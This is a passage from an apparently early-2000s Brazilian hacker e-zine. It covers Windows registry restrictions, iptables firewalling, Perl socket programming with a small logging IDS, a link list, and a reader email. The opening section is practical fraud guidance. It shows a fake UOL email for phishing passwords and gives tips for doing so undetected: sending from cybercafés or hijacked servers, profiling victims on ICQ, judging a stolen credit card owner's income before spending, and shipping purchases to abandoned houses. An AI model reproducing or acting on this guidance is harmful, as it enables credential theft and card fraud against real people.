fazer? Reenvie o formulrio com um texto mais ou menos assim:

Seu recadastramento no pode ser concludo com sucesso!
Redigite seu login e sua senha, no ser possvel alterar.
Atenciosamente UOL.

<funo do login>

viu? fcil neh? Ento,  s usar a sua criatividade. Mas tome muito cuidado 
com quem vc aplica a ES, pq se vc cata um kra que manja de HTML pelo menos, 
e analizar esse email vc jah era. O SMTP marca seu IP se vc fizer isso 
localmente, ento amigo, cuidado! 



03 - Alguns cuidados
^^^^^^^^^^^^^^^^^^^^

Bom, esta  a parte mais importante do texto. Aqui vo alguns truques que 
voc pode incluir na sua trama:

1) Nunca faa isso de sua prpria casa. Use um cybercaf ou consiga shell 
em algum servidor vulnervel pra depois acessar o SMTP.

2) Nunca pegue um determinado email e j vai enviando sem conhecer a pessoa. 
Procure pessoas no ICQ e tente conhecelas (com outra identidade) para ver o 
nvel de entendimento da mesma.

3) Ao pegar um carto, tente descobrir de alguma forma a renda da pessoa, 
assim voc poder usa-lo com tranquilidade.

4) Ao pegar uma senha, ultilize apenas para conexo, e veja se a pessoa 
assinou o plano ilimitado. Tome muito cuidado com conexes.

5) Nunca compre nada com carto e mande entregar na sua casa, se voc tiver 
uma casa abandonada ai por perto  melhor.




04 - Fim
^^^^^^^^

Mais um fim de texto. Agora  s vc usar a sua imaginao e lets hack irmo.
H muitas formas de aplicar ES, existe uma para cada situao, ento pense!!
Tente conhecer suas vtimas, saber quais so seus pontos fracos e etc..
Vida longa ao Hacking e a Engenharia Social.


=======================================================
Leia abaixo agora um texto sobre o Registro do Windows!
=======================================================

                                                 Backz
                                                 backzoverflow@yahoo.com
.:x| -------------------------------------------------------------------|x:.










SETOR [13]
==[ Registro do Windows II ]==
==[ por Protox             ]==

Ae. Vou dar umas dicas do registro do Windows que eu acho bacana, boa 
para administradores de computadores de comrcios, escolas de informtica, 
etcs. Lembrando que eu testei no Windows 95. Mas deve funcionar nos outros.
 bom j ter um conhecimento mnimo de como funciona o registro do Windows 
para no fazer besteira, pois se modificar ou apagar alguma chave importante
o Windows simplesmente deixar de funcionar.

Para aprender como mexer no registro vc pode ler a Zinebr01. L tem uma 
matria detalhada sobre isso. Para certas opes funcionarem,  preciso que 
reinicie o Windows. (Vc pode reiniciar o Windows segurando a tecla SHIFT 
para reiniciar somente o Windows).
As opes funcionam mesmo sem reiniciar o Windows, mas  se vc reiniciar, 
ir desaparecer a opo que vc desligou. (Nem todas).
Para acessar o registro, clique em Iniciar, Executar e digite: regedit
A chave que tem opes para criar novos valores que alteram o Windows e 
que ns iremos criar esses valores ser:

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies]

Nessa chave dever existir pelo menos a chave \Explorer. 
Vamos comear a ver os valores que podemos criar nessa chave:

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]

O procedimento para  criar novos valores  o seguinte:

1- Clique com o boto direito do mouse.
2- Clique em Novo. 
3- Escolha Valor DWORD.

Vai aparecer Novo Valor #1. Renomeie para: NoDrives
Depois edite o Valor DWORD para 1. (Deixe na Hexadecimal)
Explicando, 1 liga os valores que vc colocar e 0 desliga.
Saia do registro.
Pronto! Sabe o que vc fez? D dois cliques em Meu Computado e veja... ;)

As outras opes que vc pode colocar so:


NoDeletePrinter  -  No deixa usurio nenhum apagar qualquer impressora
                    instalada.
NoAddPrinter     -  No deixa usurio nenhum instalar nenhuma impressora. 
NoRun            -  Desabilita o comando Executar. 
NoSetFolders     -  Remove opes da Pasta de Configuraes do menu Iniciar.
NoSetTaskbar     -  Remove Barra de Tarefas do menu Configuraes do menu 
                    Iniciar.
NoFind           -  Remove o Comando Localizar. Faz o usurio ter que achar 
                    os arquivos na mo.
NoNetHood        -  Esconde Ambiente de Rede.
NoDesktop        -  Esconde todos os tens na rea de Trabalho.
NoClose          -  Desabilita Desligar. Ninguem poder desligar o micro.
NoSaveSettings   -  No salva alteraes ao desligar. Bom para quando 
                    indivduos imbecis bagunam todo desktop que vc levou 
                    horas para arrumar.
DisableRegistryTools - Desabilita Ferramentas de Edio de Registro. Essa 
                       opo permite vc conectar na Internet sem modem e 
                       ainda fazer download desconectado.


Passando para a outra chave agora.  a chave System.
Se caso no existir essa chave, crie-a.

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]

Como vc j deve saber como criar DWORD e como ligar os valores e desligar 
e etcs, abaixo s vai o valor DWORD e o que ele faz:

NoDispCPL            - Desabilitar Propriedades de Vdeo. As quatro opes abaixo 
                       so relacionadas  Propriedades de Vdeo.
NoDispBackgroundPage - Esconde Guia Papel de Parede. Coloque uma foto de mulher 
                       pelada no computador da escola de Informtica e ligue esse 
                       valor. ;)
NoDispScrSavPage     - Esconde Guia Proteo de Tela. Ningum vai trocar o 
                       descanso de tela daquele carinha na ilha. Algum j viu 
                       aquele carinha fazer um barco e ir embora da ilha? Eu j. 
NoDispAppearancePage - Esconde Guia Aparncia. Para ninguem mudar a aparncia 
                       horrvel que vc gosta.
NoDispSettingsPage   - Esconde Guia Configuraes. 
NoSecCPL             - Esconde Senhas do Painel de Controle. 
NoPwdPage            - Esconde Guia Alterar Senhas.
NoAdminPage          - Esconde Guia Administrao Remota.
NoProfilePage        - Esconde Guia Usurios.
NoDevMgrPage         - Esconde Guia Gerenciador de Dispositivos. (Quando vc clica 
                       com o boto direito em Meu Computador e seleciona
                       Propriedades; As tres ltimas opes so referentes  
                       Propriedades de Sistema).
NoConfigPage         - Esconde Guia Perfis de Hardware.
NoFileSysPage        - Esconde o boto Sistema de Arquivos.
NoVirtMemPage        - Esconde o boto Memria Virtual.


A prxima chave que vc pode criar  a chave Network:

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Network]

No me pergunte pra que serve detalhadamente cada opo porque eu no tive 
oportunidade de testar cada uma. Valores que podem ser inseridos:

NoNetSetupSecurityPage  - Esconde Configurar Segurana.
NoNetSetup              - Desabilita Redes no Painel de Controle.
NoNetSetupIDPage        - Desabilita Guia de Identificao.  
NoNetSetupSecurityPage  - Esconde Guia Controle de Acesso.  
NoFileSharingControl    - Esconde Controle de Compartilhamento de Arquivos.
NoPrintSharing          - Esconde Controle de Compartilhamento de Impressoras.


A finalmente vc pode criar a chave WinOldApp:

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp]

Valores que podem ser digitados:

Disabled - Desabilita Prompt do MS-DOS.
NoRealMode - Desabilita Modo MS-DOS. Quando vc clicar em Desligar, no ter
a opo "Reiniciar o computador em modo MS-DOS?".

Obs: Essa opo no funciona no Windows Me. Porque ser? :p

 isso ae galera. Essas so as opes que eu conheo. Qualquer dvida, 
email me: guest324@hotmail.com. 

Valeu Gotoxy pelo espao,
ProtoX.

==========================================
Leia abaixo agora um texto sobre Firewall!
==========================================
                                                    Protox
                                                    guest324@hotmail.com
.:x| -------------------------------------------------------------------|x:.










SETOR [14]
==[ Firewalls - Ip* ]==
==[ por Gotoxy      ]==


###############################################################
Diferenas no Fluxo de Dados entre ipfwadm, ipchains e iptables
###############################################################

Este documento tem o objetivo de esclarecer algumas diferenas em relao 
a filtro de pacotes e suas mudanas desde o Kernel 2.0 at o ltimo Kernel 
2.4. O documento no  muito extenso mas acredito esclarecer principalmente 
as diferenas nos Fluxos de Dados entre esses Kernels. Traz tambm uma 
amostra de como pode ser feito o NAT 1:1 e o STATEFUL PACKET com o iptables. 

Fluxo com IPFWADM e IPCHAINS (Kernel 2.0 e 2.2 respectivamente)

INPUT 
          ________
 INPUT   |        |   INPUT
-------> |FIREWALL| <-------
         |________|
 dados  eth0    eth1  dados

Quaisquer pacotes de dados cujo sentido seja o Firewall  considerado como 
INPUT no importando de onde venham. 

As regras de INPUT so consideradas as mais importantes regras em um Firewall 
e que normalmente a configuramos como sendo DENY por default. Pois sempre ser 
mais seguro negar tudo no filtro e apenas liberar as portas e IPs que se deseja
utilizar e nunca o inverso. 

FORWARD 

          ________
         |        |    
         |FIREWALL|
         |________|        
        eth0    eth1         
           ^     ^
           |dados|
           +-----+
           FORWARD

Quaisquer passagens de pacotes entre interfaces no Firewall,  considerado como 
sendo FORWARD, no importando o sentido do pacote e sim a mudana de interface. 

O curioso  que no existe regra para se restringir acesso entre interfaces no 
FORWARD. Ex.: no posso criar uma regra que negue determinado acesso vindo pela 
interface eth0 e que cujo destino seja a interface eth1. As minhas regras so
limitadas apenas a IPs, portas e protocolos em um FORWARD. 

Veremos que isso ir mudar com o iptables. 

Tambm costumamos defini-lo por default como sendo DENY. 

Obs.: no existem regras de FORWARD para maquinas que possuam apenas uma 
interface de rede conectadas ao micro, mas pode passar a existir se nessa 
mesma mquina for utilizado um modem para acesso remoto a outra rede. Ex.: 
eth0 - interface de rede // ppp0 - interface representada pelo modem. Nesse 
caso passo a ter duas interfaces e com isso um possvel FORWARD. Podemos 
at admitir que na mquina onde haja roteamento entre redes poderemos 
implementar regras de FOWARD. 

OUTPUT 

          ________
  OUTPUT |        |  OUTPUT
<------- |FIREWALL| ------->
  dados  |________|  dados
        eth0    eth1        

O mesmo acontece com qualquer sada de pacote de dados do Firewall, todas 
as sadas so consideradas OUTPUT. 

As regras de OUTPUT nem sempre so utilizadas pois so as ltimas regras do 
filtro pelos quais os pacotes de dados passam antes de rem para a rede. Nesse 
momento alguns administradores admitem terem filtrado ao mximo os dados que 
passaram pelas regras de INPUT e FORWARD do Firewall. 

Fluxo com IPTABLES (Kernel 2.4)

                               FORWARD    
     NAT                        dados                     NAT
 (PREROUTING ) <------------------------------------> (PREROUTING )
 (POSTROUTING)    ^ |         ________         | ^    (POSTROUTING)
                  | | INPUT  |        |  INPUT | |
            dados | +------> |FIREWALL| <------+ | dados
                  +--------- |________| ---------+
                      OUTPUT eth0   eth1 OUTPUT

Como podemos observar, temos algumas fases que no existiam no IPFWADM e 
IPCHAINS e as que existiam tiveram o seu fluxo de dados alterado. Vamos 
ento analis-los: 

Para os administradores que sonhavam com NAT(Network Address Translation) 
agora podem implement-lo com o IPTABLES no kernel 2.4. Vamos  alguns 
exemplos: 

      _______               ________
     |       |             |        |
     |       |             |        |
     | HTTP  |             |Firewall|       _________
     | Server|             |        |      | ROUTER  |  <==> INTERNET
     |       |-------------|        |------|_________|
     |_______|             |________|          200.222.5.254
    192.168.0.2     192.168.0.1  200.222.5.1
                                 200.222.5.2

Firewall: 

eth1   = 192.168.0.1
eth0   = 200.222.5.1
eth0:0 = 200.222.5.2

NAT = 192.168.0.2 <==> 200.222.5.2

Com o NAT podemos trocar o IP no pblico(192.168.0.2) pelo IP pblico
(200.222.5.2) e vice-versa. Todo pacote que vir pela INTERNET para acessar 
o servidor 200.222.5.2, passa pela regra PREROUTING do Firewall e logo em 
seguida  feito um DNAT(destination NAT) que troca o IP destino 200.222.5.2 
por 192.168.0.2 e em seguida o pacote  encaminhado para o filtro, verificado 
nas regras de FORWARD e a ento chega ao servidor destino. Quando sar um 
pacote do IP 192.168.0.2 com destino a INTERNET, o mesmo passa novamente pelas 
regras de FORWARD e logo em seguida passa para o POSTROUTING que faz o SNAT
(source NAT) onde  trocado o IP 192.168.0.2 pelo IP 200.222.5.2 e a sim vai 
para a INTERNET. O nome dado a esse tipo de acesso  NAT 1:1. 

Como puderam perceber os pacotes tanto de entrada quanto de sada no passaram 
pelas regras de INPUT e OUTPUT, porque essas regras s dizem respeito a pocotes 
direcionados ao Firewall. 

Qualquer pacote cujo destino seja o Firewall ento o mesmo passa pelas regras
de INPUT do Firewall e todo pacote que sair do Firewall passa pelas regras de 
OUTPUT do mesmo. 

Dessa forma temos como proteger mais ainda o Firewall pois podemos usar DENY 
para qualquer regra INPUT pois isso no afetaria o acesso ao servidor HTTP
mostrado acima. 

Para todos os pacotes de dados que passam de uma rede para outra atraves do 
Firewall, passam pelas regras de FORWARD e agora com o iptables, podemos 
especificar regras que controlem pacotes que entrem por uma interface em 
especfico e saiam por outra interface. 

Ex.: iptables -A FORWARD -p tcp --dport 80 -s 0/0 -i eth0 -o eth1 -j ACCEPT 

O "-i" indica interface de entrada(input) e o "-o" interface de sada(output).
Lembrando que esses parametros no funcionam com o FORWARD do IPCHAINS e IPFWADM. 

Para fazer o NAT acima bastariam 2 regras: 

iptables -A PREROUTING  -t nat -d 200.222.5.2/32 -j DNAT --to 192.168.0.2
iptables -A POSTROUTING -t nat -s 192.168.0.2/32 -j SNAT --to 200.222.5.2

Obs.: No esquecam de criar o alias eth0:0 no Firewall com o IP 200.222.5.2 seno, 
no ir funcionar. :) 

Alm disso o novo filtro traz o to esperado STATEFUL PACKET utilizado por 
programas como o Firewall-1. Com esse recurso o filtro consegue gerenciar, por 
exemplo, as conexes feitas pelas estaes e assim no deixar aberturas para 
scanners atuarem como acontecia com o to conhecido protocolo FTP e outros. 

Exemplo: 

Antigamente se fazia uma regra assim no Firewall para permitir que estaes
pudecem acessar pginas na INTERNET: 

ipchains -A input -p tcp -s 0/0 80 -d 0/0 1024: ! -y -j ACCEPT

Ou seja isto diz ao Firewall para aceitar qualquer pacote cuja porta origem 
seja a 80/tcp que no seja do tipo SYN e isso pode ser muito bem utilizado 
por scanners que utilizam pacotes ACK para checarem servios ativos. 

Com o novo filtro ficaria assim: 

 iptables -A INPUT   -m state --state ESTABLISHED,RELATED -j ACCEPT
 iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT

Dessa forma o Firewall soh aceita conexes estabelecidas pelas estaes e no 
precisamos deixar em aberto acessos vindos da porta 80/tcp, pois o Firewall 
recusaria. Dessa forma os scanners foram anulados e podemos respirar novamente
com nossos servidores. :) Podemos tambm trabalhar com o FTP em modo ativo, pois 
para cada conexo 21/tcp o Firewall espera uma outra conexo 20/tcp de retorno, 
o filtro vai gerenciar isso. 


Retirado de:
http://www.internettecnica.hpg.com.br/linux/iptables.htm
Ps: tava afim de postar um texto sobre firewall !
Autor do texto: ???


=====================================================
Leia abaixo agora um texto sobre programacao em Perl!
=====================================================

                                                   Gotoxy
                                                   gotoxy@linuxbr.com.br
.:x| -------------------------------------------------------------------|x:.










SETOR [15]
==[ Perl - Circuitos Virtuais ]==
==[ por sort                  ]==

Ola a todos, eu sort nessa edicao do zinesbr pretendo abordar neste
humilde artigo o uso de sockets em perl... Como sabem... Eu ainda nao 
engressei com perl voltado a sockets a vcs ainda...

   Vao conhecer essa maravilha, sockets ... Caro newbie, desligue som ,
radio, telefone se estiver falando e concentre-se.... Tente fixar o que 
serah redigido...

     E pelo ao contrario de muitos elitistas... eu aconselho que
script-kiddies leiam meu texto sim, quem sabe, eles nao aprendem a codar 
por aqui e param.... Gente, antes de comecar a falar de perl, irei fazer
um apelo etico a todos...


 
         VAMOS PARAR COM A DEFACEACAO GENTE POR FAVOR
                  O HACKING ETICO RULIZ =]
       PARE VC QUE DEFACEA SITES E PENSE EM SUA ATITUDE
            HOJE EM DIA EU SEI QUE VIROU MODA SER HACKER
              MAS O "HACKER" QUE MUITOS PENSAM SER      
       NAO CONSISTE EM INVASOES OCORRIDAS ATRAS DE INVASOES
                   APRENDA A PROGRAMAR...
              
            "NAO SE DEIXE INFLUENCIAR PELA BANDA PODRE
                 DA COMUNIDADE" => PALAVRAS DE DIMITRI

         MEU APELO FOI FEITO , SINTA-SE LIVRE EM APRENDER AGORA!




############################################################################
 
                           Indice

[1]          =>   O que eh um socket
[2]          =>   Vantagens da programacao voltada a socket
[3]          =>   Construindo seu primeiro simples socket (Connect e bind)
[4]          =>   Brincando com o socket usando connect
[5]          =>   Comandos uteis ao socket (ARGV revisao)
[6]          =>   Brincando na "bindagem" de portas
[7]          =>   Engatinhando em buffer
[8]* Project =>   PIDS (Uma brincadeirazinha) 
[9]          =>   Fim


##############################################################################


[1] => O que eh um socket?


Galera todos os mecanismos de IPC possuem uma grande restricao severa
Eles sao projetados para comunicacaum entre processos realizados dentro
do mesmo computador. 

   Com os sockets, voce pode fazer circuitos virtuais (como streams TCP) e
datagrams (como pacotes UDP). Voce pode fazer ainda mais, dependendo do
seu sistema. Mas o tipo mais comum de programacao de socket utiliza TCP
sobre sockets de dominio de internet. Tais sockets oferecem conexoes
confiaveis, que trabalham de um modo  semelhante  aos pipes bidirecionais
que nao estao restritos a maquina local. 

  Eu sort acabo concluindo que voce tambem usa muito o tipo socket UDP sem
saber. Toda vez que sua maquina, tenta localizar um site na internet, ela
envia pacotes UDP ao seu servidor de DNS, pedindo-lhe o endereco IP
real. Vc poderia usar o UDP por  conta propria , caso do meu grande amigao
seed , codou um programa em c normal, q enviava pacotes, ele ligou o
firewall e se assustou qnd viu que estava lhe enviando pacotes UDP, mas eu
sort devo-lhe advertir, UDP eh bem rapido mas muito pouco confiavel... 

   Entao caro amigo, preste atencao antes de fazer uma programacao na
internet.... =]



[2] => Vantagens da programacao voltada a socket


Bem vou ser breve aqui, a vantagem caro newbie fucador, eh que se vc ,
saka em algum momento uma vulnerabilidade remota e aquela vulnerabilidade
necessita de muitos comandos, vc pode fazer seu exploit e acredite em mim,
a melhor coisa que existe na vida de um programador eh ver algo que foi
feito por si funcionar com perfeicao e estabilidade....

    Portanto, socket vc deve aprender =]


[3] => Construindo seu primeiro simples socket (Connect e bind)


Vamos comecar a engatinhar.... Vamos criar algo agora, que irah se
conectar em algum lugar ou irah "bindar" uma porta do seu computador...


* Em termos leigos "bindar" significa abrir uma porta  =]
   Mas fique tranquilo que teremos controle sobre essa porta


Primeiro....

[3.5] ->    Connect


Primeira coisa a fazer, declarar path , modulos usados e variaveis...

#!/usr/bin/perl
use Socket;

#variaveis
$host_remoto = "www.uol.com.br"  #um exemplo
$porta_remota = "80";  #porta


Linha 1: Informei a localidade do perl aki no meu unix
Linha 2: Falei que eu ia precisar usar socket
Linha 3: comentario
Linha 4: Variavel especificando host
Linha 5: Variavel especificando porta

#nossa aventura comeca aki

socket(Server, PF_INET, SOCK_STREAM, getprotobyname('tcp'));


Linha 3:  O tipo de socket eh criado....

* Getprotobyname eh um comando usado pra saber qual procolo vai se usar
o caso eh TCP.

#aki nos iremos montar o endereco da maq
#Provavelmente se vc le meus textos, mexer aki nas variaveis
#nao serah problema

$end_internet = inet_aton($host_remoto) or die "Failed connect";
$endp = sockaddr_in($porta_remota, $end_internet);

Linha 4: Criamos o endereco internet, use inet_aton pra o host e or die eh
uma condicao "se ele nao conectar" ele fecha com akeal msg

Linha 5: criamos a estrutura toda do socket, endereco e porta...

#Aki ela conecta

connect(Server, $endp) or die "Failed connect";

Linha 6: Ela conecta...


      Pronto vc conectou! a frente vc vai aprender mais truques a se fazer
qnd estiver conectado!


[3.7] -> Bind

PS: Se em algum momento quiser testar faca ae

telnet localhost porta


ae ele conecta...

Agora em vez de nos conectarmos, iremos abrir uma porta pra que alguem
conecte, uhuhuhuhuhu rulixxxx =]

mesmo eskema se liga

Source:

use Socket;
$porta_servidor = "15001";
socket(Server, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
setsockopt(Server, SOL_SOCKET, SO_REUSEADDR, 1);
$meu_end = sockaddr_in($porta_servidor, INADDR_ANY);
bind(Server, $meu_end) or die "impossivel bindar";
listen(Server, SOMAXCONN) or die "Impossivel ouvir na porta
$porta_servidor";
while (accept(Client, Server)) {
#Logo logo brinke aki
}
close(Server);

Linha 1:  Modulo usado
Linha 2:  Declara a porta que serah bindada
Linha 3:  Cria o socket a ser usado
Linha 4:  setsockopt renicia o socket
Linha 5:  cria a estrutura dele
Linha 6:  binda a porta
Linha 7:  Ouve a porta
Linha 8:  Cria um laco repetitivo pra aguardar conexoes
Linha 9:  Os comandos aprendidos a frente, serao postos ali
Linha 10: fecha condicoes
Linha 11: fecha servidor


Agora vc manja conectar em algum lugar e bindar...
Vamos aprender tecnicas =]


[4] =>  Brincando com o socket usando connect

Antes de mais nada, vc deve tah achaando socket um tedio, vc vai comecar a 
ver algo util agora.... Vc sabe que os programas um exemplo
o mailer prele receber msgs
ele se conecta ao host q manda as msgs
conectou... ele manda msgs ao host tipo

user taalll
pass bleehh
msgs

algo assim... Aih bate na telha... Po como que eu vo me comunicar...
Eh simples... vc usa a funcao SEND

apos vc tiver escrito a funcao connect
vc pode usa-la assim

$msg = "user fulaninho\n";   #declare sua msg a ser enviada
send($msg, 0, Server) or die "Impossivel mandar msg";

use sempre
send($o_que_vai_enviar, 0, Nome_do_sock)
Use assim =]

Intendeu ?!?!? espero que sim..


Agora vc para e fica puto

"po eu quero ver a resposta q ele enviou apos a msg, nao tem como?!??!"

Calma mano... claro que tem


             RECVVVVVVVVVVVVVVVVVVVVVV


essa funcaozinha eh boa olhe

apos enviar use

recv($var, 0, Server) or die "Impossivel receber";
print $var;

sempre use

recv($msg_que_ficara_armazenada_a_resposta_do_socket, 0, Nome_do_sock);

isso =]



Agora vc tah comecando a engatinhar =]



[5] => Comandos uteis ao socket (ARGV revisao)



Bem galera, como numa das edicoes anteriores eu jah ensinei argv, vou
apenas falar da teoria e importancia em socket

PS: Se vc nao lembra, pegue as zines antigas e releia =]


Exemplo se vc kiser fazer algo mais util...
tipo

perl socket.pl www.microsoft.com


Que o seu programa se conecte a algo fornecido na propria hora de entrar,
vc pode usar ARGV para facilitar muita coisa


Bem eh soh isso que  vou falar de ARGV como jah falei muitooo na edicao
anterior e a materia eh sockets =]



[6] => Brincando na "bindagem" de portas


Po velho, a uns tempos eu curti legal isso, eu fikei com altas sakacoes
piradas na cabeca de codar uns eskemas , uns servicos remotos, coisa de
loko mesmo, qnt mais vc se envolve, vc se pega parado na aula de
matematica ou voltando pra ksa e vc tem altas ideias na sua cabeca, vc
chega em casa coda tudo akilo, cada vez quer mais, e sempre se superando,
bem eu sou assim.... Devo mto ao seed, meu vizinho =] trocamos sempre
info.... Entao vamo falar disso...


como nao to afim mto de explicar l00k this

ftp ftp.merda.com.br

Heloowowww, welcome to ftp  
Archives 50% it's good

Username:
Password:


Bem olhe mano... Caso de password e username aih jah eh mexendo com buffer
vo explicar daki a poko... Mas como printar as frases eu explico agora...


tem o 

print "Heloowowww, welcome to ftp\n";
print "Archives 50% it's good\n";

Nos fazemos isso e ele imprime localmente, agora como jogar isso pro
cliente ler, faz assim olha:


print Client "Heloowowww, welcome to ftp\n";
print Client "Archives 50% it's good\n";


Sem misterios neh =] 
Use o client q aih o print vai proutro lugar...

 
Agora que vc sabe fazer palhacada.... vamo ver o buffer




[7] => Engatinhando em buffer


Vou fazer algo simples, depois vc usa sua criatividade e bola seu proprio
esquema de onde usar o buffer....

Pra quem nao sabe o buffer eh nada mais nada menos do que um local onde
informacoes sao guardadas, tem a velha historia de buffer overflow q se vc
ultrapassar os dados permitidos no buffer, ele "segfaulta".... Mais eu fiz
varios ataques aki na minha casa na presenca do meu grande amigao float
FALAEEEEEEEEEEEE FLOAT VELHO =], e nao consegui estourar a pilha...

Vamos lah...

Uma pessoa  se conecta em vc e vc ker imprimir o que ela escreveu


Vc cria o eskema de bindar uma porta qualquer

Vamos usar select, apos criar o eskema, inclua lah dentro onde tem o
comentario brincaremos depois e talz... os comandos de select e os outros

select((select(Client), $| = 1)[0]; #ativa o buffer de comando isso

#enviamos algo pelo socket

print Client "Kd vc?!?!?! aloo =]\n";

#le a resposta

$variavel = <Client>;

Eh simples...
usamos 

$variavel_que_vai_ser_armazenado_resposta = <Client_ou_Servidor>;

se vc tiver conectando vc usara no final <Server> agora se vc tiver
reecbendo vc usa <Client>  .... Sakou ?

aih pra imprimir
usa

print $variavel;


aih vc le... mano eu dei o q sabia, reuna esse conhecimento e use sua
criatividade para desenvolver novas aplicacoes, eu fiz um eskeminha que
viajiava portas com meu velhow KEEPPP AMIGAUM  SUMIDO! =]





[8]* Project =>   PIDS (Uma brincadeirazinha)



Bem pra comecar o kra que me incentivou a codar esse pequena brincadeira
foi o keep, kra valeu ae keep, vc tah sumido, melhoras pro seu velho,
volta aih pra nois voltar aos tempos do code....


Sinta-se livre em fazer qualquer alteracao , mas mantenha os nomes por
favor =]


***********************  Source *******************************

#!/usr/bin/perl
#
######################################################################
#                                                                    #
# PIDS v1.0 - PIDS                                                   #
#                                                                    #
# Descricao : Simples IDS que monitora uma porta e ao receber alguma #
#             tentativa de conexao mostra o IP e a HORA de conexao   #
#             na tela e salva num arquivo de log.                    #
#                                                                    #
# Uso : ./pids.pl <PORTA> <LOGFILE>                                  #
#                                                                    #
# <PORTA> : Porta a ser monitorada                                   #
# <LOFGILE> : Arquivo de log do fids                                 #
#                                                                    #
# Desenvolvido por [KeeP] e Sort                                     #
#                                                                    #
######################################################################

sub clear { system("clear"); }

use Socket;

$ARGC=@ARGV;

if($ARGC<2) {

   print "Uso: $0 <PORTA> <LOGFILE>\n";
   exit(0); }

&clear;

$PORTA = $ARGV[0];
$LOGFILE = $ARGV[1];
$MAXCON = "5";
$PROTO = getprotobyname('tcp') or die  "Error: $!";

open(LOGFILE,">$LOGFILE");
print "#############\n";
print "# PIDS v1.0 #\n";
print "#############\n\n";

print "# Porta sendo monitorada : $PORTA\n";
print "# MAXCON : $MAXCON\n";
print "# Arquivo de log : $LOGFILE\n\n";

print LOGFILE "################\n";
print LOGFILE "# PIDS LOGFILE #\n";
print LOGFILE "################\n";

close(LOGFILE);

print "PIDS iniciado ... \n\n";

socket(SERVER,PF_INET,SOCK_STREAM,$PROTO) or die "Error $!";

bind(SERVER,sockaddr_in($PORTA,INADDR_ANY)) or die "Error: $!";
listen(SERVER,$MAXCON) or die "Error: $!";

while() {

   if(accept(CLIENT,SERVER)) {

   $HORA = localtime;

   $IPLOGADO = getpeername(CLIENT);
   @ARRAY_IPLOGADO = unpack_sockaddr_in($IPLOGADO);

   $ADDR_IPLOGADO = inet_ntoa($ARRAY_IPLOGADO[1]);

   print "[*] PIDS : [ $ADDR_IPLOGADO:$ARRAY_IPLOGADO[0] ] [ $HORA ]\n";

   open(LOGFILE,">>$LOGFILE");

   print LOGFILE "[*] Tentativa de conexao vinda de : [
$ADDR_IPLOGADO:$ARRAY_I$
   close(LOGFILE); close(CLIENT); } }



************************* fim de source ******************************


Bem eh isso ae, antes que os elitistas falem algo como jah me
menosprezaram varias vezes, digo que eh um projeto muitoooooo simples
como eu sempre disse eh uma mera brincadeira =]




[9] => Fim


   Bem chegamos ao fim, voces nunca mais me verao aki, ficaram livre de
mim =], po eh uma pena, a zine vai acabar, eh relativamente incrivel o
fato de pq tudo que comeca bem e tentao construir frutos sempre acaba?
  Eh realmente algo inexplicavel... Mas um dia todos intenderemos eh o
famoso jogo da vida.... Um abraco ao keep , seed , float, gotoxy, luke,
anarkista, wolf, fantasma, toxic, the guardian, network, cruschx, hts,
decoder, xman,crashbot, lunks, bju pra drill, minhas amigas do colegio, 
bem a todos se dediquem ao hacking e mais humildade...

     Um sincero abraco,
sort.


=========================
Veja alguns Links abaixo!
=========================
                                                   sort
                                                   sort005@yahoo.com.br
.:x|-------------------------------------------------------------------|x:.










SETOR [16]
==[ Mais Links ]==
==[ por Kbytes ]==

Iai pessoal! Abaixo vou colocar mais sites para vocs navegarem... 
alguns repetidos, mas adicionei novos links tambem! V a!


http://www.bthzine.cjb.net - Revista Digital (zine)
http://www.baitesbrasil.cjb.net - Outra Revista Digital (Zine) !
http://www.slackware.com - site slack !! 
http://www.debian.org - debian...
http://www.linux.org  - Linux
http://www.kernel.org - site do kernel do linux
http://www.linuxsecurity.com.br - site de seguranca
http://www.lockabit.com.br - outro site de security...
http://linux.oreillynet.com - site legal de linux..
http://www.unsecurity.org - um bom site..(tem textos, forum,etc)
http://www.codebr.g3.net - codebr...site do Backz
http://www.antihack0s.cjb.net - site do Keep!!
http://www.infoagora.com.br/index.php - site de programacao,SO,etc..
http://assemblybr.catar.com.br - site de Assembly
http://www.geocities.com/el8girl - tem textos legais..
http://www.digibel.org/~tompy - site do lamagra..
http://www.threecool.hpg.com.br - site legal, tem compiladores, etc...
http://www.hackpalace.com - zines, textos, etc...
http://www.big.net.au/~silvio - site com textos rulez..
http://www.englishway.hpg.com.br - aprenda ingles!:)
http://www.profbarragan.hpg.com.br - aprenda ingles!:)
http://www.estacio.br/iol - curso de ingles
http://junkcode.8k.com - visitem...
http://www.securityflaw.com/bible - milhares de textos rlz!!
http://gibson.analog.org - visite!
http://shadowpenguin.backsection.net - bom site de security
http://unsekurity.virtualave.net - c ja deve conhecer...
http://zinesbr.hpg.com.br - conhece?
http://www.google.com - "quem procura, acha!"
http://carocopunkmp3.hpg.com.br - meu site  
http://www.jonathas.com.br - site do xf86onfig (dimitri)
http://nibble.hobbiton.org - site do nibble
http://www.linuxassembly.org - assembly!         
http://www.feb.br/Micro1/index.htm - programacao
http://mahome.mingus.cjb.net - site do mingo      
http://pano.virtualave.net - site de programacao
http://marconunez.com - site do marco nunez
http://www.securityfocus.com - Security Focus
http://www.technotronic.com - um bom site de security, entre outras coisas.
http://teso.scene.at - site de programacao, seguranca, ...
http://www.w00w00.org - vale a pena ser visitado
http://www.webfringe.com/main.html - visite este aki tb
http://www.phreak.org - phreaking, security, and others...


* Brinde (the bests urls)

http://www.playboy.com.br
http://www.teens.minas.net


=================================
Leia abaixo agora a secao Emails!
=================================
                                                   kbytes
                                                   kbytes@netfor.com.br
.:x|-------------------------------------------------------------------|x:.










SETOR [17]
==[ Emails da Galera ]==
==[ por ZiNESbr      ]==


.------------------------------------------------------------.
| Formulrio enviado em: 02:18:48, 23/05/01                  |
| Nome: CANNABIS-                                            |
| Email: xxx@xxx.xxx.xxx                                     |
| Assunto: aprendiz :)                                       |
`------------------------------------------------------------'

=========
Mensagem:
=========

y0 gotoxy, blz man......os zines taum do kralho mermo, to
mandando ese e-mail mei q de improvisso. tipow to cumecando a cumecar a
tentar ser um newbie fucador, pra falar a verdade cumecei hj a ler
tutoriais
do pascal, quero comecar do basico mermo pra dpois passar pro c e dai em
